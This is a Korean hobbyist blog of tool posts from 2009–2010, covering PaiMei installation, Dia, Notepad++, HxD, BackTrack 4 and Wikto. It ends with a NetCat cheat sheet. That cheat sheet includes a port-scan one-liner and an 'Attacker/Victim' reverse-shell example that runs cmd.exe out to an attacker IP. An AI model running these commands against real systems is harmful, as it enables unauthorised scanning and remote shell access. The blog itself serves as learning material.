2010.05.10 15:27 Etc../Tool



네 , Paimei 는 킬빌 2에 나오는 캐릭터입니다











이 아니라

소개할 건 Reverse Engineering Frame work 입니다

아마 Python 을 의미하는 Py 와 발음이 비슷한 Pai 떄문에

기존에 있던 Paimei 란 캐릭터의 이름을 따와서 이름을 지은거 같군요

아무튼 상당히 괜찮다고 평이 나있는 툴입니다

오픈소스이구요

먼저 Paimei 가 어떤 툴인지는 알고 설치 하셔야겠죠?

제작자의 홈페이지 입니다

http://pedram.redhive.com/PyDbg/docs/index.html

그리고 이건 다른 분들이 작성하신 Tutorial~

http://www.crazylazy.info/blog/content/paimei-tutorial-hands-pydbg-part-1
http://www.crazylazy.info/blog/content/paimei-tutorial-simple-heap-traceing-part-2

또 RECON 2006 에서 제작자가 발표한  PDF 파일입니다

http://recon.cx/en/f/pamini-five-finger.pdf

근데 생각보다 설치하기가 좀 [ 많이 ] 까다롭더군요

선행 설치되야 하는것도 장난이 아닙니다

태그를 긁어왔는데 어째 선이 안보여서 그림으로 대체합니다 -_-



이는 제작자 페이지의 Installation 부분에서 발췌한것임을 알려드립니다

게다가 이는 Python 2.4 를 기준으로 되어 있기 때문에 약간의 수정 없이는

요즘 가장 대중적으로 쓰이는 2.5에서 오류 없이 깔기가 불가능합니다

음 그럼 설치를 시작해볼까요

http://www.openrce.org/downloads/details/208/PaiMei

에서 Paimei 를 받습니다

물론 Python 2.5 가 깔려있다는 전제하에서 하는 거구요

위 파일에서 __install_requirements 를 실행시키면 한번에 다 설치 할 수 있도록 했는데

2.4 기준이라 위 링크된 사이트에서 자신의 버전에 맞는 파일을 받아 설치하시는게

속 편하실거라고 봅니다 -,.-

아무튼 위 설치를 마치셨다면

__setup_mysql.py를 실행시켜서 db와 연결하셔야 합니다

__setup_mysql.py localhost <ID> <PassWord> 로 실행시켜주시면 됩니다


ID, Password 는 Mysql 계정정보를 입력시켜주시면 되구요

이제 __build_installer.bat 파일을 실행시켜야 합니다

저는 setup.py install 명령어를 쓰고 나선 한참 삽질했는데요

setup.py install 하면서 컴파일러가 다르다니 어쨌대니 mingw32 를 쓰라느니

그래서 cygwin 도 깔아보고 해봤는데도 안되고

나중에 찾아보니 mingw32를 써서 컴파일하는건 좀 불안정하다더군요

아무튼 이런 삽질을 피하시려면

__build_installer.bat 을 실행시키면 됩니다

물론 수정점이 있지요

c:\python\python.exe setup.py bdist_wininst --bitmap=logos\installer.bmp --title=PaiMei

를 이렇게

c:\python25\python.exe setup.py bdist_wininst --bitmap=logos\installer.bmp --title=PaiMei


바꿔주시면 됩니다

그리고 실행해주시면 주르륵 설치가 되지요

확인은 default 로 설정해주셨을때

C:\Python25\Lib\site-packages

에서 확인하실 수 있습니다

pida, pydbg, pgraph, MySqLdb 등등이 있어야 하구요

아참, 제 기억으론 setuptools 도 필요했던거 같네요

http://pypi.python.org/pypi/setuptools

버전 맞게 설치하시고

pydbg 에서 또  수정해주셔야 할게 있는데

beist lab의 ashine 님의 글을 참조하시면 OK~

http://ashine.springnote.com/pages/5585579?print=1



이제 Paimei 압축을 푼 폴더에 console 폴더에 들어가셔서

PAIMEIconsole.pyw 를 실행시키면



Paimei 님의 살인미소가 우리를 반겨주시는게 정상입니다



Paimei 의 실행모습입니다

전체적으로 깔끔한 인터페이스네요

이걸 또 PIDA 와 연결 할 수 있는데요

조심하실 점은

Paimei 의 PIDA 이외에

동일 이름을 가진 module 이 있다는 점입니다 -.-

저는 아무것도 모르고 Pida 치고 가장 먼저 나온 사이트에서 받아서 설치했었는데

왜 안되는지 한참 삽질했습니다

결국 같은 module이 아니더군요

http://pida.co.uk/

이게 아니니 조심하시길~






제가 Paimei 를   Opensrc에 있는 링크를 걸어 두었는데

googlecode에 svn에 가보니 더 최근의 소스가 있더군요 -,.-

googlecode 상에는 그런 링크 없었는데..  

아무튼

http://paimei.googlecode.com/svn/trunk/

에 가보시면 수정된 파일을 받을 수 있습니다





저걸 일일히 언제 다 받고 있겠습니까

그래서 간단히 python 코드로 짜봤습니다





파일 및 폴더 내용까지 싹 긁어다 오는 소스 입니다

제가 앞서 설명했던 것들을 여차 저차 하게 되면

다음과 같이 몇가지 메뉴가 추가된 Paimei 를 만나실 수 있습니다






Paimei Flash demo 를 보시면

pida 파일을 불러오는 것을 볼 수 있는데요



이 pida 파일은 IDA python 으로 생성된 파일입니다

IDA python 을 설치하시면 IDA 에서 python script를 실행시킬 수 있게되는데

여기서 paimei 폴더에 있는 pida_dump.py를 실행 시키면 얻으실 수 있습니다

혹시 xrefs 의 길이를 구할수 없다는 둥의 에러메세지가 뜨게 되면

xrefs를 list 로 변환해주셔야 합니다

xrefs 가 list 의 레퍼런스 인데 list로 연산을 하더군요

제가 뒤에 언급한 svn 에서는

이점이 변환되도록 수정 되었더군요



구버전으로 이래저래 삽질 많이 했었는데 참 ..



'Etc.. > Tool' 카테고리의 다른 글

[ Paimei ] Reverse Engineering Frame Work  (2) 2010.05.10
[ Dia ] 순서도 작성 프로그램  (2) 2010.04.22
[ NotePad++ ] 단축 실행 , CMD 초기 경로 지정  (0) 2010.04.09
[ Hex Editor ] HxD  (0) 2010.03.19
[ Text Editor ] Notepad++  (0) 2010.03.19
Back Track 4 Final Version Release!  (0) 2010.01.31
Posted by LinkC

2010.04.22 11:08 Etc../Tool

간단한 순서도는 워드나 파워포인트에서도 만들 수 있는데

아무래도 그보다 깔끔하고 손쉽게 만들고 싶어졌습니다

그래서 순서도 작성 프로그램을 찾아봤는데

대표적인게 MS 사의 Visio 가 있더군요

물론 라이센스가 필요합니다 -.-

2010 beta 버전은 현재 받아서 쓸수 있지만요 :D

아무튼 MS 가 만들었다보니 가장 확실한 프로그램이긴 하지만

프리웨어를 갈구하는 자들이 있는건 당연한 일이죠~

그런고로

Dia 를 소개하고자 합니다

물론 프리웨어구요

한글도 지원합니다 :D

다음 링크에서 받으실 수 있습니다

한글 입력은 언어 설정 -> 간단  으로 고치시면 되구요

다음 링크에서 받으실 수 있습니다


http://live.gnome.org/Dia/Download


다만 Windows 7 에서는 안돌아가는거 같더군요 =,.=

하지만 우리에겐 가상 XP 가 있잖아요?

잘 돌아갑니다 XP에서는 

현재는 Patch 가 됐는지 7에서도 잘 돌아갑니다 :D 맘편히 쓰세요












'Etc.. > Tool' 카테고리의 다른 글

[ Paimei ] Reverse Engineering Frame Work  (2) 2010.05.10
[ Dia ] 순서도 작성 프로그램  (2) 2010.04.22
[ NotePad++ ] 단축 실행 , CMD 초기 경로 지정  (0) 2010.04.09
[ Hex Editor ] HxD  (0) 2010.03.19
[ Text Editor ] Notepad++  (0) 2010.03.19
Back Track 4 Final Version Release!  (0) 2010.01.31
Posted by LinkC

2010.04.09 10:36 Etc../Tool


Python  코드를 입력하고 수정하는데 Notepad ++을 쓰는데

일일히 cmd 창 열기가 참 귀찮더군요 -.-

물론 cmd 초기 경로 지정은 해줬습니다만

*경로 지정은 다음과 같이 합니다

1.
HKEY_CURRENT_USER\Software\Microsoft\Command Processor 로 이동

2.  AutoRun 키 생성

3. 값 데이터를 처음 설정하고자 하는 경로 입력




이렇게 해도 포풍 놈팽이인 저는 허구한날 실행 - cmd 치기가 귀찮았습니다

그런데 Notepad++에 이런 귀차니즘을 해소시켜 줄 기능이 있더군요

바로 '실행' 기능입니다

실행 메뉴에서 실행 버튼을 누르면



다음과 같은 창이 뜨고 cmd 를 지정해주고 자신이 사용하기 편한 단축키를 지정해주시면 됩니다

근데 이걸 사용하다 보니 , 이젠 또 파일이름을 치기가 귀찮습니다

바로 실행해서 결과만 띄우주는게 없을까 하고 찾아봤는데

python.exe를 이용해서 하는게 있더군요

실행 경로는 다음과 같이 지정해주면 됩니다

C:\Python25\python.exe "$(FULL_CURRENT_PATH)"




물론 자신이 편한대로 저장을 하셔야 겠죠

지정 하고 실행을 시켜보면...

결과를 확인할 새도 없이 꺼집니다 -,.-

이 경우, 약간 추가적으로 작업을 해주셔야 하는데

python 코드에 대기하는 코드를 집어넣어주시면 됩니다

time 모듈의 sleep 이라던가

raw_input 함수를 쓰면 되겠죠?

다음은 예제입니다




어때요 참 쉽죠?

'Etc.. > Tool' 카테고리의 다른 글

[ Paimei ] Reverse Engineering Frame Work  (2) 2010.05.10
[ Dia ] 순서도 작성 프로그램  (2) 2010.04.22
[ NotePad++ ] 단축 실행 , CMD 초기 경로 지정  (0) 2010.04.09
[ Hex Editor ] HxD  (0) 2010.03.19
[ Text Editor ] Notepad++  (0) 2010.03.19
Back Track 4 Final Version Release!  (0) 2010.01.31
Posted by LinkC

2010.03.19 00:30 Etc../Tool

이쪽 부문에서는

Ultra Edit 가 강세를 보이고 있긴 합니다만

라이센스 제품인데다가 좀 무거운 느낌이 많이 들더군요

그래서 전 HxD를 사용합니다

굉장히 가볍고 오픈소스 이기 때문이죠

요즘은 정말 오픈 소스 정신이 위대해보입니다 오오

아무튼 제가 Hex Editor를 쓸땐

파일의 Hex 값을 찾거나, String을 찾거나

두 파일의 Hex 값을 비교할 때 많이 쓰는데

제가 사용할 땐 부족함이 없어보입니다 :D

http://mh-nexus.de/en/hxd/

'Etc.. > Tool' 카테고리의 다른 글

[ Dia ] 순서도 작성 프로그램  (2) 2010.04.22
[ NotePad++ ] 단축 실행 , CMD 초기 경로 지정  (0) 2010.04.09
[ Hex Editor ] HxD  (0) 2010.03.19
[ Text Editor ] Notepad++  (0) 2010.03.19
Back Track 4 Final Version Release!  (0) 2010.01.31
Wikto & Nikto  (0) 2009.11.28
Posted by LinkC

2010.03.19 00:07 Etc../Tool


한 두달 전만 해도 Edit Plus 쓰고 있었는데

지인이 Notepad++ 을 추천해줘서 갈아탔습니다 :D

http://notepad-plus.sourceforge.net/uk/site.htm



안그래도 Edit Plus가 python 코드를 지원을 안하는 모양이라

다른 Text Editor를 찾고 있었는데

Notepad++ 에서는 지원을 해주는군요~

게다가 오픈소스입니다

감사요





Python에서 중요한 들여쓰기 부분도 맘에 드는군요

옆에 - 부분을 눌러 특정 함수를 한줄로 줄일 수도 있고

필요한 플러그인도 받아서 설치 할 수 있답니다 :D

다른 분들은 뭘 쓰는지 잘 모르겠는데

이제 Text Editor를 쓰시려고 하시는 분에게

Notepad++을 추천해드립니다


'Etc.. > Tool' 카테고리의 다른 글

[ NotePad++ ] 단축 실행 , CMD 초기 경로 지정  (0) 2010.04.09
[ Hex Editor ] HxD  (0) 2010.03.19
[ Text Editor ] Notepad++  (0) 2010.03.19
Back Track 4 Final Version Release!  (0) 2010.01.31
Wikto & Nikto  (0) 2009.11.28
How to use NetCat[NC]?  (0) 2009.10.31
Posted by LinkC

2010.01.31 03:02 Etc../Tool

Back Track 4 Final Version 이 드디어 나왔군요

http://www.backtrack-linux.org/downloads/

'Etc.. > Tool' 카테고리의 다른 글

[ NotePad++ ] 단축 실행 , CMD 초기 경로 지정  (0) 2010.04.09
[ Hex Editor ] HxD  (0) 2010.03.19
[ Text Editor ] Notepad++  (0) 2010.03.19
Back Track 4 Final Version Release!  (0) 2010.01.31
Wikto & Nikto  (0) 2009.11.28
How to use NetCat[NC]?  (0) 2009.10.31
Posted by LinkC

2009.11.28 12:41 Etc../Tool

 Wikto는 Nikto 의 윈도우 GUI 버전이라고 보면 된다

웹 스캐너로서 유명세를 떨치고 있는 툴인데

Wikto의 경우 구글 API 를 이용하며 1,000개 이상의 구글 검색 결과로 구성된 GHDB(Google Hacking Database)라는
 
이름의 목록을 보유하고 있는데, WIKTO는 최신 GHDB 취약성 목록을 가져와서 구글에서 검색하여 사용자의 도메인이

가진 이런 허점을 찾아낼 수 있다.

이 툴은 www.sensepost.com /research/wikto 에서 간단한 등록 후 받을 수 있다



'Etc.. > Tool' 카테고리의 다른 글

[ NotePad++ ] 단축 실행 , CMD 초기 경로 지정  (0) 2010.04.09
[ Hex Editor ] HxD  (0) 2010.03.19
[ Text Editor ] Notepad++  (0) 2010.03.19
Back Track 4 Final Version Release!  (0) 2010.01.31
Wikto & Nikto  (0) 2009.11.28
How to use NetCat[NC]?  (0) 2009.10.31
Posted by LinkC

2009.10.31 16:53 Etc../Tool


connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, background mode
        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]



Port Scanning
echo quit | nc -vv -w 5 [ip] [port range]

-> port range에 각각 quit 이란 문자를 보내고 5초간 대기한다



File Transfer
ex)Server :nc -l -p 1024 </tmp/test.tgz
Client: nc [Server ip] > test.tgz






Getting Shell


ex) Attacker: nc -l -p 1024
Victim: nc -e cmd.exe -n [Attacker ip] 1024

'Etc.. > Tool' 카테고리의 다른 글

[ NotePad++ ] 단축 실행 , CMD 초기 경로 지정  (0) 2010.04.09
[ Hex Editor ] HxD  (0) 2010.03.19
[ Text Editor ] Notepad++  (0) 2010.03.19
Back Track 4 Final Version Release!  (0) 2010.01.31
Wikto & Nikto  (0) 2009.11.28
How to use NetCat[NC]?  (0) 2009.10.31
Posted by LinkC
 TAG NC, Netcat, 넷캣
이전버튼 1 이전버튼

블로그 이미지
LinkC

태그목록

Tistory Cumulus Flash tag cloud by BLUEnLIVE requires Flash Player 9 or better.

공지사항

Yesterday49
Today11
Total323,945

달력

 « |  » 2018.12
            1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31          

최근에 받은 트랙백

글 보관함


. .